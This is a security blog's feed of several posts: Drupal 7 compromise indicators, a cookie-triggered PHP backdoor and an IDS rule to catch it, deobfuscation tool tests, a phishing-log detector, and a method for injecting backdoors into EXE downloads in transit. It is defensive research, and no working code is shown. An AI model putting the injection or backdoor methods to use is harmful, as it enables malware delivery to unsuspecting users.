Drupal 7 SQL Injection Info http://www.kahusecurity.com/2014/drupal-7-sql-injection-info/ http://www.kahusecurity.com/2014/drupal-7-sql-injection-info/#comments Sun, 02 Nov 2014 23:52:28 +0000 http://www.kahusecurity.com/?p=13261 Continue reading ]]> There’s a lot of sites covering this vulnerability but I wanted to document some indicators for anyone who might need it.

Drupal Security Advisory
Drupal Public Service Annoucement
Drupal Documentation on “Your Drupal Site Got Hacked. Now What?”
Drupal Site Audit
Volexity Blog
Sururi Blog

What follows is a brief walk-through of evidence found on a couple of compromised hosts. YMMV.

Incident Response
Logging into phpMyAdmin and checking out the “users” table. Two accounts were created. The “drupaldev” account seems to have been found on many compromised hosts.


There was one host that had hundreds of accounts. What made the malicious accounts stand out was the missing mail field. This would occur if the user could get past the requirement on the registration page or if the account was added directly to the table.

Going to the “sessions” table, there’s one entry with the “uid” that matches the account created by the attacker. You can find out the attacker’s IP address this way.


Here’s info on this IP address:


The firewall logs showed activity over port 8888. If you visit the IP:port, you get this site:


Looking at the webserver logs, we can see POSTs hitting the user/login file on the host. The server 500 errors probably indicate a failed first attempt.


Going back to phpMyAdmin, a quick search for “.php” was done across all of the tables.


There was an entry found in the “menu_router” table which seems to be a very common indicator.


Clicking on the link, you can download the blob.


Going to the file system, there is a directory called “README.txt” with a php file inside. The folder and file names appear to be random but the script itself is the same as what others have reported.

This PHP script is particularly interesting, it’s a simple backdoor that’s triggered by a cookie. Sucuri covered this awhile ago.

Here’s a cleaned up version. If you hit the script straightaway, you will get the results of phpinfo(). If you wish to send your own commands, you need to pass three variables. The “Kcqf3” variable contains a value that triggers the script. The second variable “Kcqf2” will be preg_replace. “Kcqf1” contains the command. I imagine the attackers might send commands along the lines of uname, wget, curl, etc.


I wrote a program to craft HTTP requests and can include my own cookie values into the header. Here, I’m sending the phpinfo command and you can see the result in the background. What stands out is its simplicity and cleverness.


You could create an IDS rule to look for HTTP requests that contain a cookie with the value “preg_replace” and detect/block those coming in. You can then follow up on the targeted host to see if the backdoor is there.

Good luck!

http://www.kahusecurity.com/2014/drupal-7-sql-injection-info/feed/ 0
Tools Update http://www.kahusecurity.com/2014/tools-update-2/ http://www.kahusecurity.com/2014/tools-update-2/#comments Sun, 05 Oct 2014 19:16:00 +0000 http://www.kahusecurity.com/?p=13247 Continue reading ]]> No significant updates, just several enhancements and bug fixes to four tools:

– Added new features to Custom PHP Search/Replace
– Added Convert Word (to decimal) feature
– Enhanced Key Search/Replace input checking (see Data Converter changes)
– Improved Beautify Generic routine
– Updated some labels to provide more clarity
– Fixed PHP decoder toggle
– Fixed Base64 by Delimiter option to handle nulls
– Fixed unescape issue by removing ` replacement
– Fixed Character Frequency array function to remove last item
– Fixed Base64 to Text function to properly handle CRLFs

Data Converter
Thanks to Thijs Bosschert for his suggestions. I still need to look into his additional enhancements without slowing things down but for now:
– Split by single char if key value is text
– Split every two chars if key value is hex
– Remove spaces and commas if input value is hex

– Added –ignore-ssl-errors=true option to PhantomJS call

– Added –ignore-ssl-errors=true option to PhantomJS call

Thanks for your support!

http://www.kahusecurity.com/2014/tools-update-2/feed/ 0
Javascript Deobfuscation Tools Redux http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/ http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/#comments Wed, 24 Sep 2014 06:00:35 +0000 http://www.kahusecurity.com/?p=13241 Continue reading ]]> Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.

Here are the tools I’ll be testing:
Javascript Deobfuscator (Firefox Add-On)

Javascript Debugger (all are similar; using Script Debugger for this test): Microsoft Script Debugger, Chrome Developer Tools, Firefox Developer Tools, Firebug (Firefox Add-On)

Here are the obfuscated scripts:
Sample 1
Dean Edwards Packer


Sample 2
HiveLogic Enkoder


Sample 3
For this sample, I used the same original HTML code as the above and obfuscated it using three online obfuscators in the following order: obfuscatorjavascript.com, www.gaijin.at/en/olsjse.php, www.atasoyweb.net/Javascript_Encrypter/javascript_encrypter_eng.php


Sample 4
Speed-Trap JS


Sample 5
Gong Da EK


Sample 6


Sample 7
Angler EK


Sample 8
Nuclear EK


My plan is simple. Use the tools to try to deobfuscate the above scripts without spending more than a few minutes on each one. If I can’t figure it out by making obvious tweaks along the way then I move on. To be honest, I’m no expert with all of these tools so I’m not taking full advantage of its capabilities but this should give you some idea of what you can expect.

I would encourage you to play along (the scripts are here) . Be sure you do this in a virtual machine because many of the scripts are real and very malicious.

JSUnpack is fully automated and can deal with a lot of scripts except the complex ones.








Javascript Deobfuscator
This Firefox add-on is quite robust and also completely automated. Interestingly, it is able to deobfuscate the hard ones but trips up on an easy one. This tool won’t be able to handle scripts that target Internet Explorer for obvious reasons. You might be able to comment out some browser sniffing routines though.









The SpiderMonkey tool would be similar to using Rhino or V8 engines but Didier Stevens adds some mods that has beefed up SpiderMonkey’s capabilities. DOM-based scripts tend to pose a problem for these engines but you can make several tweaks to the script and define objects to get around this.









This tool has a lot of capability and potential. The main reason it can’t deob the malicious scripts is probably because I suck at using it.









Javascript Debugger
Pretty much all of the Javascript debuggers work the same way so I just lumped them together as a single class of tools. Using a debugger can be slow because you have to follow along with the script and know where to place breakpoints but it is often the most effective way of deobfuscating scripts.









I would have hoped my own tool would do pretty well against these scripts and it did. The main challenge with using Revelo is that you need to understand the script you are working on and be able to recognize entry and exit points to inspect. This tool is definitely not for everyone but it has the capability to do just as well as a debugger.









Conclusion and Scorecard
As I mentioned earlier, I’m probably not making the most of every tool as they are quite capable and powerful in their own right. The end result is probably more of a reflection of my abilities rather than the tool so take this with a barrel of salt.


http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/feed/ 0
Detecting Phishing Sites in Your Logs http://www.kahusecurity.com/2014/detecting-phishing-sites-in-your-logs/ http://www.kahusecurity.com/2014/detecting-phishing-sites-in-your-logs/#comments Sat, 13 Sep 2014 05:48:30 +0000 http://www.kahusecurity.com/?p=13175 Continue reading ]]> I recently read the Anti-Phishing Working Group’s 2Q 2014 report and saw the number of unique phishing sites. I then compared the numbers with the previous year.


After more than 10 years of phishing it’s still around, and growing! Back then, there were companies offering clients a way to detect phishing attacks by analyzing their own web server logs. I wrote my own program in 2006 and decided to update it and offer it up as freeware in case anyone needs a tool like this (I wrote a Python script that does the same thing which I’ll probably push onto Github one day).

The idea behind this and other similar tools is to analyze referers in your web server logs. These referers are generated when a user visits a phishing page and submits the form. Upon receiving the user’s credentials, the phishing page will often redirect the user to the legitimate website. The referer will contain the URL of the phishing site.

In other phishes, the contents of the phishing page are composed of images, stylesheets, and Javascript from the legitimate site in order to make it look exactly like the original to fool unsuspecting users. Again, we can find out the URL of the phishing page by looking at the referers it generates.

Keep in mind that if the phishing website is self-contained (that is, does not need any files from the legitimate site) and does not redirect the user back to the legitimate site then there would be no trace in the web server logs.

Let’s take a look at a typical phish. Here I went to PhishTank.com and try to find a phishing site that’s still up:


Here’s what the site looks like:


When I proceeded through the pages where it asks for more and more personal and financial information, I eventually get to the last page:


Clicking on the Continue button takes me to the main Paypal site (it’s the Danish version for some reason):


I captured the source code of last phishing page and it looks like this. Notice that it contains links back to the real Paypal site. I’ve highlighted the link to the main logo graphic.


If we were to look at Paypal’s web server logs, it might look something like this (note the last line). There’s a GET request to the logo graphic and the referer is the URL of last phishing page that called the graphic up.


If we could find these entries in our log files, we’d find these phishing sites and get them taken down. And we don’t need to rely on users telling us about it. There’s also an added bonus. Sometimes phishers will test their creation first and their referers show up in the logs and we can take down those phishing sites before their phishing campaign can even begin!

Here’s where the program, Sounder aka FishFinder, comes in:


The top portion is where you define folders and filenames. You also need to define the column that contains the referer information (be sure your logs contain referer information or this program won’t work!) and line separator. There’s debug modes to help you.

You can have it check the Contents of the potential phishing site by scanning for content keywords as defined below. For example, if you enter login, password, email, and username that you see there, the program will check if the website has any of those keywords and tell you if there’s a match on the results file.

The Check Filename option will check if the referer contains any of the blacklisted items. The blacklist textbox should contain filenames of known bad referers. In the case of Paypal, it might be something like “paypal.com.html” or “logon.php”. The whitelist textbox would be URLs that you would want to ignore like partner websites, spiders, portals, etc.

If the Capture Screen option is set, the program will screenshot the page for visual inspection. This feature requires PhantomJS. I’ve included the required “rasterize.js” file in my download so you just need to copy the PhantomJS executable into the folder.

Finally, the Server File (Referers) textbox should contain the paths to files on your web server that is often used on phishing pages. Here, I’ve included the path to the logo file.

You can save (and load) the settings by clicking on the appropriate buttons on the bottom. The program uses an INI file which contains helpful descriptions and worth looking at before you use the program.


When Sounder is run, it will scan the files in the Logs folder and look for any HTTP request matching the items in the “Server Files (Referers)” textbox then inspect the referer. If the referer is known bad then it will automatically flag it. If the referer is on the whitelist, it will ignore it. If the referer is neither good nor bad then it will flag it as suspicious so you can have a chance to inspect it. You should then add the referer to either the white or black list as appropriate for future runs.

If the referer is marked suspicious then it will (optionally) visit the page and check if the webpage contents contain any of the items in the “Content Keywords” textbox and grab the screen, regardless of whether there were any keyword matches.


Here’s the results file that shows that this particular referer was suspicious and the keyword “login” was found on the webpage.


This is the screenshot that PhantomJS captured.


I hope you find this program useful!

http://www.kahusecurity.com/2014/detecting-phishing-sites-in-your-logs/feed/ 0
A Quick Peek at Network Injection http://www.kahusecurity.com/2014/a-quick-peek-at-network-injection/ http://www.kahusecurity.com/2014/a-quick-peek-at-network-injection/#comments Thu, 21 Aug 2014 03:15:05 +0000 http://www.kahusecurity.com/?p=13160 Continue reading ]]> Like many of you, I’ve been looking at the various NSA document leaks to see what kind of tools and techniques are being used. I suppose these releases will give cybercriminals new ideas and we will see some of these put to nefarious use sooner than later.

This particular article was very interesting, especially the concept of network injectors. I’ve heard about EvilGrade but never played with it. It seems as though QUANTUMINSERT and FinFly ISP do something similar.

I wondered how I could use this for a pentest. Getting inline with my target would be the first challenge. There are several tools I could use to route wired and wireless network traffic to my computer but maybe an easier way is to setup a proxy server then push out a proxy.pac file.

Here’s a website with a link to a setup file for Revelo.


When the user downloads the program, I can see their GET request and response. At this point the program gets downloaded. Here we see excerpts from Paros.


The way QUANTUMINSERT is described to work, the download request gets silently redirected to another server where an implant gets downloaded. And according to the FinFisher documentation, there is a method called “INJECT-EXE” which “infects the downloaded EXE file in real time. The agent is installed when the target runs the EXE file.”

There’s not too much details so I can only infer how this is being done. Maybe they would have pre-downloaded popular programs, binded it with a backdoor, then sent the file over via a forged HTTP redirect. This would allow the user to install the real program with real certificates but have their program run too.

But how could you do this in real-time, with any download? If I can write a program that intercepts the GET request to any EXE program, bind it with a backdoor in real-time, update the Content-Length field in the response header, and send the file along…it *should* work. 😉

After some coding, I came up with “Interjector” – Interceptor and Injector (because of the nature of this program I won’t be making this available, sorry). There’s not much to look at I know.


With Interjector off, when I download the file, it looks like this:


However, when Interjector is running, the same download dialog box now looks like this (note the file size):


What’s happening behind the scenes is that there is a specially-crafted EXE file that’s been added to Interjector as a resource. When the program sees a GET request to any EXE file, it loads the resource to a variable and gets ready. When the program sees the response, it reads in the Content-Length value, adds the length of the resource to it, and puts the updated value back into the header. Finally, it injects the variable containing the resource into the download stream.

The advantage of doing it this way is that I don’t need to redirect users to another server, I can intercept/inject any EXE file the user downloads, it’s very stealthy, and all of this happens in real time.

Here’s what it looks like when the downloaded file is executed:


Ugh, the icon makes it look fake but I can fix that. This is going to be a challenge for those programs with unique icons. The best way is probably to use a generic icon like this and hope users don’t notice.


What about the MD5/SHA hash? That’s the biggest hurdle to overcome. I could change the hash on the webpage to match the final file but only for the ones I know about by doing a global search and replace. Or I can search for any hash line and remove it from the webpage.


What if it’s a compressed file download (e.g. ZIP)? I think I would have to rezip the file with a new EXE or rebuild the download which changes the ZIP file to an EXE. The real-time requirement makes this difficult to handle without the user taking notice.

So what’s a user to do?
– Use HTTPS to download programs
– Choose to download a compressed version (e.g. ZIP) instead of a bare EXE/MSI file
– Pay attention to any anomalies and inconsistencies; when in doubt, stop
– Verify the program’s hash before installing (for the paranoid, use an out-of-band device like your phone to view the hash on the webpage)

http://www.kahusecurity.com/2014/a-quick-peek-at-network-injection/feed/ 0
Wild Wild West – 07/2014 http://www.kahusecurity.com/2014/wild-wild-west-072014/ http://www.kahusecurity.com/2014/wild-wild-west-072014/#comments Fri, 25 Jul 2014 19:15:55 +0000 http://www.kahusecurity.com/?p=13149 Added the following packs:

RIG Exploit Kit
Niteris aka “CottonCastle”

Special thanks to Kafeine for his valuable input.


http://www.kahusecurity.com/2014/wild-wild-west-072014/feed/ 0
Reversing a PHP Script Dynamically and Statically http://www.kahusecurity.com/2014/reversing-a-php-script-dynamically-and-statically/ http://www.kahusecurity.com/2014/reversing-a-php-script-dynamically-and-statically/#comments Sat, 12 Jul 2014 05:45:55 +0000 http://www.kahusecurity.com/?p=13140 Continue reading ]]> A reader sent me two PHP scripts because the PHP Converter program I wrote wasn’t able to handle it. They are both similar so I’ll just work on one of them in this post. Here’s what it looks like:


And this is what happens when you try to use PHP Converter:


Let’s reverse this script dynamically and then statically.

First, I’ll just change the ‘eval’ keyword to ‘echo’.


And take a peek at what’s going on.


Yikes, this is messed up! I thought the PHP file got corrupted somehow but then I looked closely and noticed several PHP keywords. This is actually a pretty clever technique. Basically the script is converting the strange characters to text but it’s surrounded by long, seemingly random strings that are variable names.

So I figure I would just write it out to a file and then change the ‘eval’ I noticed at the end to ‘echo’.


Here’s the resulting file:


I’ll just make that quick change and run it again.


Cool, now we know what this script does!

Now let’s reverse this script statically.

Here’s a new, fixed version of PHP Converter. I added a filter to present the results of the deobfuscation without stopping if it encounters any strange characters. The characters outside the alphanumeric range will be represented by a neutral character.


I also added the ability to output the result to Base64 format and/or to a file. With both options checked, you will get a text file of the result encoded in Base64 so the binary values will be preserved.


Now I can convert this base64-encoded string to text using Converter.


After cleaning this up, we can see that the section below is XOR’ing the blob using the decimal value of ’30’ which is assigned to the first variable.


I’m going to convert the base64-encoded string to hex this time.


Then send the data to Converter’s Key Search/Convert feature and set the values accordingly:


And I get this result. The junk at the top and bottom is the result of XOR’ing the original text so I can ignore that.


There are other ways to get to the final result but I think these two methods are straightforward and quick/easy to do.

The updated version of PHP Converter can be downloaded here.

http://www.kahusecurity.com/2014/reversing-a-php-script-dynamically-and-statically/feed/ 0